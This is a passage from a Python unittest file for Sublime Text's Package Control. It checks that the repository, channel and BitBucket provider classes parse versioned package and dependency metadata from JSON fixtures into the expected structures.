[(
'package_control-tester',
{
'name': 'package_control-tester',
'description': 'A test of Package Control upgrade messages with '
'explicit versions, but date-based releases.',
'homepage': 'https://bitbucket.org/wbond/package_control-tester',
'author': 'wbond',
'readme': 'https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md',
'issues': 'https://bitbucket.org/wbond/package_control-tester/issues',
'donate': None,
'buy': None,
'sources': ['https://bitbucket.org/wbond/package_control-tester'],
'labels': [],
'previous_names': [],
'releases': [
{
'date': LAST_COMMIT_TIMESTAMP,
'version': LAST_COMMIT_VERSION,
'url': 'https://bitbucket.org/wbond/package_control-tester/get/master.zip',
'sublime_text': '*',
'platforms': ['*']
}
],
'last_modified': LAST_COMMIT_TIMESTAMP
}
)],
packages
)
def test_get_sources(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual(
['https://bitbucket.org/wbond/package_control-tester'],
provider.get_sources()
)
def test_get_renamed_packages(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual({}, provider.get_renamed_packages())
def test_get_broken_packages(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual(list(), list(provider.get_broken_packages()))
def test_get_dependencies(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual(list(), list(provider.get_dependencies()))
def test_get_broken_dependencies(self):
provider = BitBucketRepositoryProvider(
'https://bitbucket.org/wbond/package_control-tester',
self.bitbucket_settings()
)
self.assertEqual(list(), list(provider.get_broken_dependencies()))
class RepositoryProviderTests(unittest.TestCase):
maxDiff = None
def settings(self):
return {
'debug': True,
'cache': HttpCache(604800),
'query_string_params': {
'api.github.com': {
'client_id': CLIENT_ID,
'client_secret': CLIENT_SECRET
}
}
}
def test_get_packages_10(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-1.0',
{
"name": "package_control-tester-1.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json'
],
"last_modified": "2011-08-01 00:00:00",
"releases": [
{
"version": "1.0.1",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_dependencies_10(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json',
self.settings()
)
dependencies = [dependency for dependency in provider.get_dependencies()]
self.assertEqual([], dependencies)
def test_get_packages_12(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-1.2',
{
"name": "package_control-tester-1.2",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json'
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_dependencies_12(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json',
self.settings()
)
dependencies = [dependency for dependency in provider.get_dependencies()]
self.assertEqual([], dependencies)
def test_get_packages_20_explicit(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-2.0-explicit.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-2.0',
{
"name": "package_control-tester-2.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": "https://example.com",
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-2.0-explicit.json'
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_dependencies_20(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-2.0-explicit.json',
self.settings()
)
dependencies = [dependency for dependency in provider.get_dependencies()]
self.assertEqual([], dependencies)
def test_get_packages_20_github(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-2.0-github_details.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-2.0-gh',
{
"name": "package_control-tester-2.0-gh",
"author": "packagecontrol-test",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-2.0-github_details.json',
"https://github.com/packagecontrol-test/package_control-tester"
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_packages_20_bitbucket(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-2.0-bitbucket_details.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-2.0-bb',
{
"name": "package_control-tester-2.0-bb",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-2.0-bitbucket_details.json',
"https://bitbucket.org/wbond/package_control-tester"
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1-beta.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://bitbucket.org/wbond/package_control-tester/get/0.9.0.zip",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_packages_300_explicit(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-3.0.0-explicit.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[(
'package_control-tester-3.0.0',
{
"name": "package_control-tester-3.0.0",
"author": ["packagecontrol", "wbond"],
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": "https://gratipay.com/wbond/",
"buy": "https://example.com",
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-explicit.json'
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["windows"],
"dependencies": ["bz2"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
)],
packages
)
def test_get_dependencies_300_explicit(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/repository-3.0.0-explicit.json',
self.settings()
)
dependencies = [dependency for dependency in provider.get_dependencies()]
self.assertEqual(
[
(
'bz2',
{
"name": "bz2",
"load_order": "02",
"author": "wbond",
"description": "Python bz2 module",
"issues": "https://github.com/wbond/package_control/issues",
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-explicit.json'
],
"releases": [
{
"version": "1.0.0",
"url": "https://packagecontrol.io/bz2.sublime-package",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
),
(
'ssl-linux',
{
"name": "ssl-linux",
"load_order": "01",
"description": "Python _ssl module for Linux",
"author": "wbond",
"issues": "https://github.com/wbond/package_control/issues",
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-explicit.json'
],
"releases": [
{
"version": "1.0.0",
"url": "http://packagecontrol.io/ssl-linux.sublime-package",
"sublime_text": "*",
"platforms": ["linux"],
"sha256": "d12a2ca2843b3c06a834652e9827a29f88872bb31bd64230775f3dbe12e0ebd4"
}
]
}
),
(
'ssl-windows',
{
"name": "ssl-windows",
"load_order": "01",
"description": "Python _ssl module for Sublime Text 2 on Windows",
"author": "wbond",
"issues": "https://github.com/wbond/package_control/issues",
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-explicit.json'
],
"releases": [
{
"version": "1.0.0",
"url": "http://packagecontrol.io/ssl-windows.sublime-package",
"sublime_text": "<3000",
"platforms": ["windows"],
"sha256": "efe25e3bdf2e8f791d86327978aabe093c9597a6ceb8c2fb5438c1d810e02bea"
}
]
}
)
],
dependencies
)
def test_get_packages_300_github(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[
(
'package_control-tester-3.0.0-gh-tags',
{
"name": "package_control-tester-3.0.0-gh-tags",
"author": "packagecontrol-test",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json',
"https://github.com/packagecontrol-test/package_control-tester"
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
),
(
'package_control-tester-3.0.0-gh-tags_base',
{
"name": "package_control-tester-3.0.0-gh-tags_base",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json'
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/0.9.0",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
),
(
'package_control-tester-3.0.0-gh-tags_prefix',
{
"name": "package_control-tester-3.0.0-gh-tags_prefix",
"author": "packagecontrol-test",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json',
"https://github.com/packagecontrol-test/package_control-tester"
],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "1.0.2",
"date": "2014-11-28 20:54:15",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/win-1.0.2",
"sublime_text": "<3000",
"platforms": ["windows"]
}
]
}
),
(
'package_control-tester-3.0.0-gh-branch',
{
"name": "package_control-tester-3.0.0-gh-branch",
"author": "packagecontrol-test",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": "https://github.com/packagecontrol-test/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://raw.githubusercontent.com/packagecontrol-test"
"/package_control-tester/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-github_releases.json',
"https://github.com/packagecontrol-test/package_control-tester"
],
"last_modified": LAST_COMMIT_TIMESTAMP,
"releases": [
{
"version": LAST_COMMIT_VERSION,
"date": LAST_COMMIT_TIMESTAMP,
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/master",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
)
],
packages
)
def test_get_packages_300_bitbucket(self):
provider = RepositoryProvider(
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-bitbucket_releases.json',
self.settings()
)
packages = [package for package in provider.get_packages()]
self.assertEqual(
[
(
'package_control-tester-3.0.0-bb-tags',
{
"name": "package_control-tester-3.0.0-bb-tags",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-bitbucket_releases.json',
"https://bitbucket.org/wbond/package_control-tester"
],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1.zip",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.1-beta.zip",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:14:13",
"url": "https://bitbucket.org/wbond/package_control-tester/get/1.0.0.zip",
"sublime_text": "*",
"platforms": ["*"]
},
{
"version": "0.9.0",
"date": "2014-11-12 02:02:22",
"url": "https://bitbucket.org/wbond/package_control-tester/get/0.9.0.zip",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
),
(
'package_control-tester-3.0.0-bb-tags_prefix',
{
"name": "package_control-tester-3.0.0-bb-tags_prefix",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-bitbucket_releases.json',
"https://bitbucket.org/wbond/package_control-tester"
],
"last_modified": "2014-11-28 20:54:15",
"releases": [
{
"version": "1.0.2",
"date": "2014-11-28 20:54:15",
"url": "https://bitbucket.org/wbond/package_control-tester/get/win-1.0.2.zip",
"sublime_text": "<3000",
"platforms": ["windows"]
}
]
}
),
(
'package_control-tester-3.0.0-bb-branch',
{
"name": "package_control-tester-3.0.0-bb-branch",
"author": "wbond",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://bitbucket.org/wbond/package_control-tester",
"issues": "https://bitbucket.org/wbond/package_control-tester/issues",
"donate": None,
"buy": None,
"readme": "https://bitbucket.org/wbond/package_control-tester/raw/master/readme.md",
"previous_names": [],
"labels": [],
"sources": [
'https://raw.githubusercontent.com/wbond/package_control-json'
'/master/repository-3.0.0-bitbucket_releases.json',
"https://bitbucket.org/wbond/package_control-tester"
],
"last_modified": LAST_COMMIT_TIMESTAMP,
"releases": [
{
"version": LAST_COMMIT_VERSION,
"date": LAST_COMMIT_TIMESTAMP,
"url": "https://bitbucket.org/wbond/package_control-tester/get/master.zip",
"sublime_text": "*",
"platforms": ["*"]
}
]
}
)
],
packages
)
class ChannelProviderTests(unittest.TestCase):
maxDiff = None
def settings(self):
return {
'debug': True,
'cache': HttpCache(604800)
}
def test_get_name_map_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
{},
provider.get_name_map()
)
def test_get_renamed_packages_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
{},
provider.get_renamed_packages()
)
def test_get_repositories_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json",
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json"
],
provider.get_repositories()
)
def test_get_sources_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json",
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json"
],
provider.get_sources()
)
def test_get_packages_12(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-1.2.json',
self.settings()
)
self.assertEqual(
{
"package_control-tester-1.0": {
"name": "package_control-tester-1.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2011-08-01 00:00:00",
"releases": [
{
"version": "1.0.1",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json"
)
)
self.assertEqual(
{
"package_control-tester-1.2": {
"name": "package_control-tester-1.2",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json"
)
)
def test_get_name_map_20(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
{},
provider.get_name_map()
)
def test_get_renamed_packages_20(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
{},
provider.get_renamed_packages()
)
def test_get_repositories_20(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-1.0.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-1.2.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-explicit.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-github_details.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-bitbucket_details.json"
],
provider.get_repositories()
)
def test_get_sources_20(self):
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
[
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-1.0.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-1.2.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-explicit.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-github_details.json",
"https://raw.githubusercontent.com/wbond/package_control-json"
"/master/repository-2.0-bitbucket_details.json"
],
provider.get_sources()
)
def test_get_packages_20(self):
self.maxDiff = None
provider = ChannelProvider(
'https://raw.githubusercontent.com/wbond/package_control-json/master/channel-2.0.json',
self.settings()
)
self.assertEqual(
{
"package_control-tester-1.0": {
"name": "package_control-tester-1.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2011-08-01 00:00:00",
"releases": [
{
"version": "1.0.1",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2011-08-01 00:00:00",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.0.json"
)
)
self.assertEqual(
{
"package_control-tester-1.2": {
"name": "package_control-tester-1.2",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": None,
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1-beta",
"sublime_text": "<3000",
"platforms": ["windows"]
},
{
"version": "1.0.0",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.0",
"sublime_text": "<3000",
"platforms": ["*"]
}
]
}
},
provider.get_packages(
"https://raw.githubusercontent.com/wbond/package_control-json/master/repository-1.2.json"
)
)
self.assertEqual(
{
"package_control-tester-2.0": {
"name": "package_control-tester-2.0",
"author": "packagecontrol",
"description": "A test of Package Control upgrade messages with "
"explicit versions, but date-based releases.",
"homepage": "https://github.com/packagecontrol-test/package_control-tester",
"issues": None,
"donate": None,
"buy": "https://example.com",
"readme": None,
"previous_names": [],
"labels": [],
"last_modified": "2014-11-12 15:52:35",
"releases": [
{
"version": "1.0.1",
"date": "2014-11-12 15:52:35",
"url": "https://codeload.github.com/packagecontrol-test"
"/package_control-tester/zip/1.0.1",
"sublime_text": "*",
"platforms": ["windows"]
},
{
"version": "1.0.1-beta",
"date": "2014-11-12 15:14:23",
